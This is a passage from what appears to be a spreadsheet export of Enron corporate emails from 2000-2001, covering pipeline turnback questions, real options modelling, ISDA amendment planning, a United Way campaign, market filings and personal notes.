 have ROFR rights to extend their contract after the initial term.  Is _x000D_
turnback capacity_x000D_
 and the evaluation process that TCPL is proposing considering extending _x000D_
contracts_x000D_
 beyond the primary term?_x000D_
_x000D_
5) Turnback premiums and turnback discounts.  I believe the goal should be _x000D_
that_x000D_
 Shipper's such as Sithe, who have the longest contract term on TCPL's shipper_x000D_
 list, are protected from any increased rate base that will lead to higher _x000D_
prices in_x000D_
 the future if the entire pipeline is not fully contracted.  This is an _x000D_
optimization step_x000D_
 that needs to be included during the bid evaluations.  I am not clear whether_x000D_
 the proposed NPV approach and the Policy Item #7 fully protects long-term _x000D_
 shippers?_x000D_
_x000D_
6) During the NPV evaluation, are 100% tolls used or just the reservation _x000D_
charges?_x000D_
_x000D_
7) The valuation of the NPV cost of new Facilities and/or "Transportation by _x000D_
Others"_x000D_
 capacity to meet new service reuirements.  Sithe's St. Clair to Chippawa _x000D_
transport_x000D_
 is already a "TBO" capacity contract from Dawn to Chippawa.  Could the _x000D_
wording_x000D_
 be changed in the evaluation formula so that TCPL considers the net cost _x000D_
impact_x000D_
 to the TCPL. on the net facility impact, rather than just any new savings in _x000D_
"TBO" _x000D_
 capacity costs?  _x000D_
_x000D_
8) All turnback costs and revenues will be recorded in a Flow-Through Deferral_x000D_
 Account.   Will remaining firm shippers see all the benefit or the cost from _x000D_
how_x000D_
 this account will be applied in the next subsequent Test Year?_x000D_
_x000D_
 _x000D_
If you have any questions, please call me at x31667,_x000D_
_x000D_
Ruth</t>
  </si>
  <si>
    <t>Tue, 19 Dec 2000 22:37:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Did you notice emmissions trading made 6 Million this quarter.  Glad we could _x000D_
help.</t>
  </si>
  <si>
    <t>Fri, 2 Mar 2001 03:52:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'carmen.perez@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'carmen.perez@enron.com', 'barbara.hueter@enron.com', 'karen.huang@enron.com', 'margo.reyna@enron.com', 'stephen.burns@enron.com', 'linda.robertson@enron.com', 'jeff.dasovich@enron.com', 'mona.petrochko@enron.com', 'eric.benson@enron.com', 'richard.shapiro@enron.com', 'marchris.robinson@enron.com', 'ricardo.charvel@enron.com', 'john.neslage@enron.com', 'xi_xi@enron.net', 'donald_lassere@enron.net', 'lara.leibman@enron.com', 'susan.landwehr@enron.com', 'mike.dahlke@enron.com', 'allison.navin@enron.com', 'scott.bolton@enron.com'})</t>
  </si>
  <si>
    <t>Conference Call</t>
  </si>
  <si>
    <t>The subject for next Monday morning's conference call  will be updates.  As _x000D_
usual, the time for the conference call is 11:15am (CST),  and the dial-in _x000D_
number is:  888/311-9051 - pass code 60396._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Sue</t>
  </si>
  <si>
    <t>Tue, 16 May 2000 02:31:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Real options presentation</t>
  </si>
  <si>
    <t xml:space="preserve">Thanks for the comments Grant.  The presentation is for a couple of external _x000D_
conferences that Vince volunteered me for - Vince has OK'd the content, and _x000D_
Stinson raised exactly the same issues as you.  Unfortunately I just don't _x000D_
seem to be getting any response from RISK whatsoever on the publication of my _x000D_
article, so these conferences will be the public debut for my real options _x000D_
notation._x000D_
_x000D_
Of course the discounting/risk neutrality thing is where the real judgement _x000D_
sits.  When questions arise I'll take the line that while Research formulates _x000D_
the models using appropriate derivatives/market based valuation methods, we _x000D_
work with our RAC group which considers the discounting to be associated with _x000D_
various risks, and chooses these rates appropriately.  The notation makes _x000D_
clear which uncertainties we are exposed to at different stages of the deals, _x000D_
which assists in choosing the rates._x000D_
_x000D_
In practice I'm not yet at the stage where originators are using my notation _x000D_
yet - another reason I can't say too much about its actual use at the _x000D_
conference.  I'm producing various tools for deterministic hydro _x000D_
optimization, GBM swing option valuation, and deterministic DP optimization _x000D_
for genset dispatch which people want right now - I'm working in the _x000D_
background on the kind of modelling my notation demands.  People are getting _x000D_
to know me as a guy who can solve their immediate problems, and they'll be _x000D_
more likely to listen when  I start rolling out the "proper" options-based _x000D_
models.  My notation is currently used only in the specs I'm writing for the _x000D_
tools I'm producing._x000D_
_x000D_
I'll be turning Dale's spreadsheet-based power plant spread model into an _x000D_
American Monte Carlo tool, which will then be available for inclusion in _x000D_
other models.  I think by the end of the summer the real options theoretical _x000D_
work will start to bear fruit, one year after I initially proposed the _x000D_
notation.  With the quant IT group I'm co-creating in place, I may yet see _x000D_
the automated diagramming/pricing tool made real._x000D_
_x000D_
Thanks also for the pointer to Tom Halliburton.  The use of the LINGO _x000D_
LP/integer package is something I've been presented with for the Teesside _x000D_
plant operation optimizer, rather than something I chose.  The PERM (Physical _x000D_
Energy Risk Mgt) group just got a couple of analysts to hack it together _x000D_
(including Natasha Danilochkina), then asked me to tidy it up when it didn't _x000D_
work.  They are going to use their existing faulty model for now (to meet _x000D_
their project deadlines), and I'm sketching out a proper mathematical spec _x000D_
for the problem._x000D_
_x000D_
I've persuaded (!) them that this sort of business-critical system should be _x000D_
developed properly by Research, and they now seem happy to fall into line.  _x000D_
Their Wilton plant optimizer was developed by one Peter Morawitz, the guy I _x000D_
hoped to recruit into Research, and they obviously didn't realise he was _x000D_
better than average at quantitative modelling.  Anyway they now accept that _x000D_
doing it properly will take months rather than weeks, and I'll have a freer _x000D_
hand in my choice of modelling tool - so a chat with Tom would be extremely _x000D_
valuable._x000D_
_x000D_
Cheers,_x000D_
Steve_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
   _x000D_
	Enron Capital &amp; Trade Resources Corp._x000D_
	_x000D_
	From:  Grant Masson                           05/15/2000 07:27 PM_x000D_
	_x000D_
_x000D_
To: Steven Leppard/LON/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: Real options presentation_x000D_
_x000D_
Steve:_x000D_
_x000D_
I read through your presentation.  Looks good as expected.  Remind me; is _x000D_
this an internal Enron or external presentation? If external, I would say it _x000D_
is just at the limit before sliding into proprietary stuff.  Perhaps that's _x000D_
why you've neatly almost entirely avoided questions about discounting and _x000D_
risk-neutrality or lack of it?_x000D_
_x000D_
Regards,_x000D_
Grant._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 30 Mar 2000 07:45:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'nicholas.stephan@enron.com'})</t>
  </si>
  <si>
    <t>Have you written for the list yet?</t>
  </si>
  <si>
    <t>Hey, just wondering how your weekend of golf went.  Wouldn't want to be _x000D_
accused of cutting off contact again.  _x000D_
_x000D_
P.S. -- I got a very interesting response from Plauche following the mass _x000D_
email...he is definitely a different chap.</t>
  </si>
  <si>
    <t>Mon, 2 Jul 2001 06:12:14 -0700 (PDT)</t>
  </si>
  <si>
    <t>i forgot you were working....</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
-----Original Message----- _x000D_
From: Pat Campbell [mailto:pcampbell@us-contractors.com ] _x000D_
Sent: Monday, July 02, 2001 8:26 AM _x000D_
To: Beth.Cherry@enform.com _x000D_
Subject: 4th _x000D_
Are you and Jay going to the hut?  Granny needs a head count to cook shrimp. _x000D_
I hope you guys can come.  We'll have fun. _x000D_
Love _x000D_
Mom _x000D_
Trav need to bring that game of his that's so fun!! </t>
  </si>
  <si>
    <t>Mon, 4 Dec 2000 11:09:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'raimund.grube@enron.com'})</t>
  </si>
  <si>
    <t>Re: Coral Energy</t>
  </si>
  <si>
    <t xml:space="preserve">The word is that giving the notice could put the equipment on the balance _x000D_
sheet.  If the Coral deal didn't close, the equipment would be tainted.  _x000D_
Therefore, the giving of the notice needs to occur after we feel certain that _x000D_
the Coral transaction will close._x000D_
_x000D_
The assignment and assumption agreement have been reviewed by Rob Taylor, and _x000D_
he thinks the agreement is fine._x000D_
_x000D_
Kay_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Raimund Grube_x000D_
12/04/2000 07:01 PM_x000D_
To: Kay Mann/Corp/Enron@Enron_x000D_
cc: Ben Jacoby/HOU/ECT@ECT, Rebecca Walker/NA/Enron@Enron _x000D_
_x000D_
Subject: Coral Energy_x000D_
_x000D_
Kay,_x000D_
_x000D_
I will be out of the office for the next two days (Tuesday and Wednesday).  _x000D_
We are in the process of getting the DASH signed -- Rebecca Walker will be _x000D_
pursuing signatures tomorrow._x000D_
_x000D_
The other outstanding issues are the Option Notice, the Assignment Agreement _x000D_
and an agreement with Coral. Have we received an update regarding the Option _x000D_
Notice from Rob Taylor?  _x000D_
_x000D_
Rebecca needs to know when to send the wire transfer by 2:00 PM on the day _x000D_
before any funds need to be sent.  In addition, we do need to give WLB at _x000D_
least two days notice of any wire transfer (formally 5 days, but Rose _x000D_
Engeldorff indicated that we should be OK with 2 days)._x000D_
_x000D_
 If you have any questions, you may contact me at 713-516-5409 for the next _x000D_
two days.  I will be back in the office on Thursday._x000D_
_x000D_
_x000D_
Best regards,_x000D_
Raimund D. Grube_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 26 Dec 2001 11:09:18 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'s..theriot@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'w..white@enron.com', 'stacey.richardson@enron.com', 'kevin.sweeney@enron.com', 'c..gossett@enron.com', 'todd.hall@enron.com', 'ann.murphy@enron.com'})</t>
  </si>
  <si>
    <t>FW: Updated terminations</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Panus, Stephanie  _x000D_
Sent:	Friday, December 21, 2001 10:14 AM_x000D_
To:	Theriot, Kim S._x000D_
Subject:	Updated terminations_x000D_
_x000D_
Kim, _x000D_
The attached list contains some counterparties that were previously on the Master Termination Log and have now been determined to be valid terminations._x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Mon, 6 Aug 2001 07:20:28 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'alice.wright@enron.com'})</t>
  </si>
  <si>
    <t>FW: United Way Leadership Giving Campaign Update</t>
  </si>
  <si>
    <t>_x000D_
Can you help me w making the online contribution ($250) - thanks_x000D_
_x000D_
Elizabeth Sager_x000D_
713-853-6349_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Enron Announcements/Corp/Enron@ENRON [mailto:IMCEANOTES-Enron+20Announcements_Corp_Enron+40ENRON@ENRON.com]  On Behalf Of Mark Haedicke.@ENRON_x000D_
Sent:	Thursday, August 02, 2001 8:37 PM_x000D_
To:	United Way EWS Business Groups- EWS Legal@ENRON_x000D_
Subject:	United Way Leadership Giving Campaign Update_x000D_
_x000D_
_x000D_
Today is the final day of the EWS United Way Leadership Giving Campaign and we need your help!_x000D_
_x000D_
If you have already made your pledge, thank you for your generosity.  If not, we need you to read on._x000D_
_x000D_
To date, we have pledges of $327,075, which is over 25% of our total EWS goal of $1,276,000 and over 42% of our EWS Leadership goal of $765,600.  This Leadership goal is 60% of the total EWS goal and we would like to have 100% participation from EWS Leadership._x000D_
_x000D_
Here are the pledge totals and participation rates by EWS Business Unit Group:_x000D_
_x000D_
	Group			Pledge Total		Participation Rate_x000D_
	EA			$39,275		3.54%_x000D_
	EGM			$51,740		4.38%_x000D_
	EIM			$42,515		11.35%_x000D_
	ENW			$49,444		1.81%_x000D_
	EEOS			$22,138		12.63%_x000D_
	EWS HR		$5,460			4.17%_x000D_
	EWS Business Analysis and Reporting_x000D_
				$23,794		11.01%_x000D_
	EWS Legal		$27,380		10.87%_x000D_
	EWS Treasury		$12,236		42.86%_x000D_
	EWS Research		$13,000		4.26%_x000D_
	EWS Business Development_x000D_
$10,588		37.50%_x000D_
_x000D_
To meet our EWS Leadership goal, we need all of the EWS leadership to participate.  It only takes a couple of minutes.  Please click on https://hrglobal.enron.com/ and complete your online pledge.  You will need your GIS ID and password.  If you are not sure what your ID and password are, please go to https://ehronline.enron.com, click the "Accept" button, and then click on "Forgot your User ID or Password?"_x000D_
_x000D_
The company-wide campaign kicks off on Monday and we would like to announce to the EWS organization that the EWS leaders have set the pace for a successful campaign exceeding our goal of $765,600.  Your contribution will help make this happen._x000D_
_x000D_
Thank you in advance for your participation.</t>
  </si>
  <si>
    <t>Thu, 11 Oct 2001 08:37:58 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'kathryn.cordes@enron.com'})</t>
  </si>
  <si>
    <t>RE: ConfirmLogic Target Customer List-Legal Entity Name</t>
  </si>
  <si>
    <t>Kathryn:_x000D_
_x000D_
The customers appearing on Kim's list have been assigned to various lawyers in the swap group.  There are 22 parties on the list and 16 of these parties have ISDA Master Agreements with ENA.  We will focus on the ISDA customers first.  We will use the template developed by Brent for Entergy-Koch as a basis for the 16 parties.  The template will be customized for each of the 16 parties.  Brent has a preliminary template underway and it should be further refined by October 19.  Using that  template, our goal is to produce six (6) new amendments each week.  We should finish the ISDA customers in about three weeks (first drafts).  The remaining customers have no master agreement in place or an ECT Master Agreement.  Those six (6) customers include:_x000D_
_x000D_
	Sempra Energy Trading Corp. (old master)_x000D_
	Morgan Stanley Capital Group Inc. (old master)_x000D_
	Dynegy Marketing and Trade (old master)_x000D_
	Ameren Energy (none)_x000D_
	American Electric Service Power Corporation (none)_x000D_
	PacificCorp Power Marketing Inc. (under negotiation with ECC)_x000D_
_x000D_
The physical power group can coordinate the amendments with the members of the swap group listed above by forwarding drafts to us._x000D_
_x000D_
Please let me know if you have further questions.  Thanks.  Sara_x000D_
_x000D_
Sara Shackleton_x000D_
Enron Wholesale Services_x000D_
1400 Smith Street, EB3801a_x000D_
Houston, TX  77002_x000D_
Ph:  (713) 853-5620_x000D_
Fax: (713) 646-3490_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Cordes, Kathryn  _x000D_
Sent:	Wednesday, October 03, 2001 4:52 PM_x000D_
To:	Theriot, Kim S.; Shackleton, Sara_x000D_
Cc:	Taylor, Mark E (Legal); Greenberg, Mark; Hansen, Leslie; Smith, Jennifer Marie_x000D_
Subject:	RE: ConfirmLogic Target Customer List-Legal Entity Name_x000D_
_x000D_
Sara:_x000D_
_x000D_
I have followed up with Brent and he is working on the Entergy-Koch amendment for CommodityLogic.  He cannot commit to a completion date at this time since he has some other priorities.  I've asked for Friday and he has indicated that may be aggressive.  The sales team is presenting Entergy-Koch the CommodityLogic legal agreements today (ESA, Password application, Subscription Agreement).  In light of this, can you provide a status of where the other 18 customer amendments are (excluding Sempra and Entergy-Koch) ?  The Sales process is moving along and we will need to have these amendments ready to present to the customer soon.  Could you go through the list and provide an estimate date of when a draft of the amendment would be available by client.  We need to provide a status to management on Monday 10/8.  _x000D_
_x000D_
Per our conversation today, if there is a way to focus on the creation of a template that addresses the confirmation exchange via electronic systems (e.g. ConfirmLogic) that can be shared earlier with the clients.  The additional language that is deemed necessary can be added to this form as needed per counterparty.  This will allow us to achieve getting something to the client so they can start the process from their side while we continue to shore up what language needs to be added.  We still need to be thinking of how to keep this process simple to allow quick turnaround yet satisfy the legal requirements for confirmations.  I ask that you and Leslie continue to help define a better process for us and I will continue to work with Kim and the sales team to implement this process._x000D_
_x000D_
Thanks for your help_x000D_
Kathryn_x000D_
 -----Original Message-----_x000D_
From: 	Theriot, Kim S.  _x000D_
Sent:	Tuesday, September 18, 2001 12:30 PM_x000D_
To:	Shackleton, Sara_x000D_
Cc:	Cordes, Kathryn; Taylor, Mark E (Legal); Greenberg, Mark; Hansen, Leslie_x000D_
Subject:	ConfirmLogic Target Customer List-Legal Entity Name_x000D_
Importance:	High_x000D_
_x000D_
Sara,_x000D_
See attached spreadsheet which shows the legal entity names by counterparty for each commodity.  Name differences between the commodities are highlighted in Blue._x000D_
_x000D_
Kim Theriot_x000D_
_x000D_
 &lt;&lt; File: Top20 Legal Entity Names.xls &gt;&gt; _x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Shackleton, Sara  _x000D_
Sent:	Monday, September 17, 2001 9:56 AM_x000D_
To:	Theriot, Kim S._x000D_
Cc:	Greenberg, Mark; Cordes, Kathryn; Taylor, Mark E (Legal); Hansen, Leslie_x000D_
Subject:	ConfirmLogic Target Customer List_x000D_
_x000D_
Kim:_x000D_
_x000D_
I am reviewing the list of 20 target customers dated 9/14/01 in an effort to set up a document drafting timetable.  _x000D_
_x000D_
For financial trading purposes, I need an accurate list of trading counterparties reflecting the complete name of each legal entity.  Also, if a company is split into more than one legal entity (such as power and gas) for financial trading purposes, I need the names of both entities._x000D_
_x000D_
Thanks._x000D_
_x000D_
Sara Shackleton_x000D_
Enron Wholesale Services_x000D_
1400 Smith Street, EB3801a_x000D_
Houston, TX  77002_x000D_
Ph:  (713) 853-5620_x000D_
Fax: (713) 646-3490</t>
  </si>
  <si>
    <t>Wed, 14 Nov 2001 11:34:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'ddellacona@hess.com'})</t>
  </si>
  <si>
    <t>RE: ISDA Master Agreement</t>
  </si>
  <si>
    <t>Marie,_x000D_
_x000D_
I have received the documents and am reviewing them now._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Dana_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
		-----Original Message-----_x000D_
		From:	Heard, Marie [mailto:Marie.Heard@ENRON.com]_x000D_
		Sent:	Wednesday, November 14, 2001 2:24 PM_x000D_
		To:	ddellacona@Hess.com_x000D_
		Cc:	Sayre, Frank_x000D_
		Subject:	ISDA Master Agreement_x000D_
_x000D_
		 &lt;&lt; File: enron-ahc schedule-execution copy.11-14.doc &gt;&gt; &lt;&lt;_x000D_
File: enron-ahc credit support annex-execution copy1.11-14.doc &gt;&gt; Attached,_x000D_
for your review, are final execution copies of the Schedule to_x000D_
		the ISDA Master Agreement, together with Paragraph 13 to the_x000D_
ISDA Credit_x000D_
		Support Annex.  Please note that Part 5(j) of the Schedule_x000D_
was changed_x000D_
		pursuant to your discussion with Frank Sayre._x000D_
_x000D_
_x000D_
		Marie Heard_x000D_
		Senior Legal Specialist_x000D_
		Enron North America Corp._x000D_
		Phone:  (713) 853-3907_x000D_
		Fax:  (713) 646-3490_x000D_
		marie.heard@enron.com_x000D_
_x000D_
_x000D_
						 &lt;&lt;enron-ahc_x000D_
schedule-execution_x000D_
		copy.11-14.doc&gt;&gt; 	 &lt;&lt;enron-ahc credit support_x000D_
annex-execution_x000D_
		copy1.11-14.doc&gt;&gt;_x000D_
_x000D_
_x000D_
_x000D_
**********************************************************************_x000D_
		This e-mail is the property of Enron Corp. and/or its_x000D_
relevant affiliate and may contain confidential and privileged material for_x000D_
the sole use of the intended recipient (s). Any review, use, distribution or_x000D_
disclosure by others is strictly prohibited. If you are not the intended_x000D_
recipient (or authorized to receive for the recipient), please contact the_x000D_
sender or reply to Enron Corp. at enron.messaging.administration@enron.com_x000D_
and delete all copies of the message. This e-mail (and any attachments_x000D_
hereto) are not intended to be an offer (or an acceptance) and do not create_x000D_
or evidence a binding and enforceable contract between Enron Corp. (or any_x000D_
of its affiliates) and the intended recipient or any other party, and may_x000D_
not be relied on by anyone as the basis of a contract by estoppel or_x000D_
otherwise. Thank you._x000D_
_x000D_
**********************************************************************</t>
  </si>
  <si>
    <t>Thu, 4 Oct 2001 06:59:56 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'tim.cooper@enron.com'})</t>
  </si>
  <si>
    <t>GulfSouth OBA Letter</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
Please forward this letter &amp; invoice to GulfSouth.  I am sending an email copy to Claire._x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Mon, 27 Nov 2000 05:14:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Writeup on methodology for Bankruptcy Swap Pricing Regression Model</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 11/27/2000 _x000D_
01:14 PM ---------------------------_x000D_
_x000D_
_x000D_
Amitava Dhar@ENRON_x000D_
11/14/2000 03:45 PM_x000D_
To: Vince J Kaminski/HOU/ECT@ECT, Vasant Shanbhogue/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Writeup on methodology for Bankruptcy Swap Pricing Regression Model_x000D_
_x000D_
This is the first draft.  Please let me know if you want me make changes._x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 18 May 2001 01:36:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>NYISO -  Notice of Automated Mitigation Procedure (AMP) Filing</t>
  </si>
  <si>
    <t>Dear Market Participants,_x000D_
_x000D_
Attached is the Exigent Circumstances_x000D_
Filing of the NYISO at the Direction_x000D_
of its Board of Directors to Implement_x000D_
Automated Mitigation Procedure,Request for_x000D_
June 15th Effective Date and Request for_x000D_
Shortened Comment Period that was filed_x000D_
at FERC._x000D_
_x000D_
Regards,_x000D_
_x000D_
Kristen Kranz_x000D_
NYISO Market Services_x000D_
518-356-6186_x000D_
_x000D_
(See attached file: Savitt AMP Affidavit(v1).pdf)(See attached file:_x000D_
Automated Mitigation Procedures (AMP) Filing Letter(v4).pdf)(See attached_x000D_
file: Market Mitigation Meaures with Automated Mitigation Procedures_x000D_
(AMP)(v4).pdf)(See attached file: AMP Redline.PDF)_x000D_
 - Savitt AMP Affidavit(v1).pdf_x000D_
 - Automated Mitigation Procedures (AMP) Filing Letter(v4).pdf_x000D_
 - Market Mitigation Meaures with Automated Mitigation Procedures (AMP)(v4) _x000D_
.pdf_x000D_
 - AMP Redline.PDF</t>
  </si>
  <si>
    <t>Wed, 11 Apr 2001 10:09:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Weekly Clickpaper Management Report for 04-04-01 to 04-10-01</t>
  </si>
  <si>
    <t xml:space="preserve">Clickpaper Executive Summary for 4/10/01_x000D_
Transaction Summary	New in Prior_x000D_
	24 Hours	LTD_x000D_
External Transactions 	5	288_x000D_
Notional Value of Deals Completed 	$1,252,890	$691,169,665_x000D_
Notional Tonnage of Deals Completed	2,000 tons	1,178,760 tons_x000D_
Notional Board Feet	110,000 BF	24,192,000 BF_x000D_
Notional Square Feet	0 SF	2,910,000 SF_x000D_
_x000D_
Registration Activity	New in Prior_x000D_
	24 Hours	LTD_x000D_
Registered Clickpaper Users	1	458_x000D_
Guest ID's Issued	0	2,429_x000D_
Credit/Legal Review in Process	3	17_x000D_
Credit Declined with Process Complete	0	12_x000D_
Number of Password Applications Received	9	573_x000D_
_x000D_
Products Offered	New in Prior_x000D_
	24 Hours	LTD_x000D_
Number of Financial Products Offered	0	60_x000D_
Number of Physical Products Offered	0	63_x000D_
_x000D_
Counterparty Activity	 _x000D_
Number of Counterparties Having Transacted to Date	44_x000D_
New Counterparties Transacting for the First Time Today	1_x000D_
</t>
  </si>
  <si>
    <t>Fri, 14 Jul 2000 04:10:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>GPG Officers' Meeting</t>
  </si>
  <si>
    <t>pls put on my calendar.  thanks df_x000D_
---------------------- Forwarded by Drew Fossum/ET&amp;S/Enron on 07/14/2000=20_x000D_
11:09 AM ---------------------------_x000D_
  =20_x000D_
=09_x000D_
=09_x000D_
=09From:  Dave Schafer                           07/14/2000 08:04 AM_x000D_
=09_x000D_
_x000D_
Sent by: Alma Navarro_x000D_
To: Rod Hayslett/FGT/Enron@ENRON, John Ballentine/FGT/Enron@ENRON, James=20_x000D_
Saunders/FGT/Enron@ENRON, Shelley Corman/ET&amp;S/Enron@ENRON, Phil=20_x000D_
Lowry/OTS/Enron@ENRON, Dan Pribble/OTS/Enron@ENRON, Michael=20_x000D_
Moran/ET&amp;S/Enron@ENRON, Dave Schafer/OTS/Enron@ENRON, Steve=20_x000D_
Hotte/Corp/Enron@ENRON, John Goodpasture/OTS/Enron@ENRON, Bill=20_x000D_
Cordes/ET&amp;S/Enron@ENRON, Dave Neubauer/ET&amp;S/Enron@ENRON, Mary Kay=20_x000D_
Miller/ET&amp;S/Enron@ENRON, Mike McGowan/ET&amp;S/Enron@ENRON, Steven=20_x000D_
Harris/ET&amp;S/Enron@ENRON, Drew Fossum/ET&amp;S/Enron@ENRON, Larry=20_x000D_
DeRoin/NPNG/Enron@ENRON, Ray Neppl/NPNG/Enron@ENRON, Janet=20_x000D_
Place/NPNG/Enron@ENRON, George Rood/NPNG/Enron@ENRON, Bob M=20_x000D_
Hall/FGT/Enron@ENRON, Robert Kilmer/FGT/Enron@ENRON, Robert=20_x000D_
Hayes/FGT/Enron@ENRON, James Prentice/GPGFIN/Enron@ENRON, Dorothy=20_x000D_
McCoppin/FGT/Enron@ENRON, Rick Craig/OTS/Enron@Enron, John=20_x000D_
Dushinske/ET&amp;S/Enron@ENRON, Kent Miller/ET&amp;S/Enron@ENRON, Rockey=20_x000D_
Storie/ET&amp;S/Enron@ENRON, Louis Soldano/ET&amp;S/Enron@ENRON, Julia=20_x000D_
White/ET&amp;S/Enron@ENRON, Michel Nelson/ET&amp;S/Enron@ENRON, Robert=20_x000D_
Hill/NPNG/Enron@ENRON, Robert Meyers/ENRON@Gateway, John=20_x000D_
Shafer/OTS/Enron@Enron, Jerry Peters/NPNG/Enron@ENRON_x000D_
cc: Cindy Stark/Corp/Enron@ENRON, Lisa Costello/OTS/Enron@ENRON=20_x000D_
_x000D_
Subject: GPG Officers' Meeting_x000D_
_x000D_
You are invited to join Stan Horton=01,s staff meeting this Monday, July 17=_x000D_
, at=20_x000D_
10:00 a.m.  As usual, the meeting will be held via videoconference, so you=_x000D_
=20_x000D_
can join us in EB49C2 in Houston or in OMA717 in Omaha.  The meeting will=_x000D_
=20_x000D_
probably last about a half-hour._x000D_
_x000D_
See you Monday._x000D_
_x000D_
Dave Schafer</t>
  </si>
  <si>
    <t>Tue, 2 Jan 2001 12:21:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'kari.dohn@gov.ca.gov'})</t>
  </si>
  <si>
    <t>Follow up materials</t>
  </si>
  <si>
    <t xml:space="preserve">Greetings Kari:_x000D_
_x000D_
Attached is follow-up information from the meeting that the Governor and you _x000D_
had with Ken Lay and Steve Kean last Thursday.  Tomorrow morning I will email _x000D_
three additional pieces of information:_x000D_
_x000D_
Our specific comments on the proposals that the Governor raised at the _x000D_
meeting._x000D_
More details on the "demand buy-down" concept._x000D_
Information on Norway's version of the ISO, "Nord Pool."_x000D_
_x000D_
If there's anything you need, don't hesitate to contact me at 415.782.7822._x000D_
_x000D_
Happy New Year._x000D_
_x000D_
Best,_x000D_
Jeff_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 30 Apr 2001 14:19:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jmenconi@houston.rr.com'})</t>
  </si>
  <si>
    <t>Re: Patches</t>
  </si>
  <si>
    <t xml:space="preserve">that makes me very happy. i'll talk to you later..i'll catch dinner on my own..see you at the casa_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"John Menconi" &lt;jmenconi@houston.rr.com&gt; on 04/30/2001 07:40:28 AM_x000D_
To:	"Mo" &lt;Monique.Sanchez@enron.com&gt;_x000D_
cc:	 _x000D_
Subject:	Patches_x000D_
_x000D_
_x000D_
You'll be happy to know that Patches is safe and sound across the street in_x000D_
the neighbors yard._x000D_
_x000D_
I'll be at a golf tournament most of the day which includes dinner.  I_x000D_
should be home around 8:30._x000D_
_x000D_
L, Me_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 23 Oct 2001 04:59:35 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW: Summary RTO Week Day 2 -- Planning &amp; Expansion</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
 -----Original Message-----_x000D_
From: =09Nicolay, Christi L. =20_x000D_
Sent:=09Monday, October 22, 2001 11:57 AM_x000D_
To:=09Kitchen, Louise; Dietrich, Janet; Delainey, David; SMITH, Douglas; La=_x000D_
vorato, John; Black, Don; Forster, David; Duran, W. David; Belden, Tim; Cal=_x000D_
ger, Christopher F.; Foster, Chris H.; Black, Tamara Jae; Aucoin, Berney C.=_x000D_
 ; Furrow, Dale; Meyn, Jim; Harvey, Claudette; Presto, Kevin M.; Jacoby, Be=_x000D_
n_x000D_
Subject:=09FW: Summary RTO Week Day 2 -- Planning &amp; Expansion_x000D_
_x000D_
FYI. =20_x000D_
_x000D_
TJ and Claudette -- please forward to your groups.  Thanks._x000D_
_x000D_
 -----Original Message-----_x000D_
From: =09Walton, Steve =20_x000D_
Sent:=09Wednesday, October 17, 2001 10:17 PM_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
  RTO Week_x000D_
Day 2 -- October 16, 2001_x000D_
Transmission Planning &amp; Expansion_x000D_
The afternoon panel discussed transmission planning and expansion. The pane=_x000D_
lists were: Jose Degado--CEO American Transmission Company, Michael Dworkin=_x000D_
--Chair Vermont PSC, Mark Maher--VP Transmission Business Line, Bonneville =_x000D_
Power Administration, Lara Manz--PSE&amp;G, Masheed Rosenqvist--National Grid, =_x000D_
Steve Walton--Enron._x000D_
General Observations_x000D_
The Commissioners were all present although the did leave and return from t=_x000D_
ime to time.  Commissioner's Breathitt and Massey were the most active in q=_x000D_
uestioning.  The FERC Staff were active in asking questions after the initi=_x000D_
al presentations, moving along the discussion by asking questions.  There w=_x000D_
as some reference to the morning discussion of congestion management, howev=_x000D_
er, there was no discussion of the merits of the various types of transmiss=_x000D_
ion rights.  There was a good deal of consensus around the concept of the R=_x000D_
TO Planning Process being first a provider of information to the market (wh=_x000D_
ere are problems, how might they be solved, etc.) and that the where possib=_x000D_
le that expansion be funded by market participants who would benefit.  Ther=_x000D_
e was a good deal of discussion of "least cost planning" and the identifica=_x000D_
tion of options which are not transmission related.  All agreed there had t=_x000D_
o be backstop authority to build transmission, however then the challenge i=_x000D_
